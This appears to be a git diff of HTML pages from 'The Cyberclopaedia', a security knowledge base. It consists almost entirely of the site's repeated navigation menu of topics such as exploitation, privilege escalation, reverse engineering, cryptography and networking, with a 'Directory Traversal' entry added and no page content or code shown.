  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

The Cyberclopaedia

- - diff --git a/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html b/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html index 12a8fb0a..e327917e 100644 --- a/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html +++ b/docs/Exploitation/Binary Exploitation/Heap Exploitation/Use After Free (UAF).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -269,22 +269,6 @@

Example

- - diff --git a/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html b/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html index fa09a2b8..b6622eaa 100644 --- a/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html +++ b/docs/Exploitation/Binary Exploitation/Heap Exploitation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
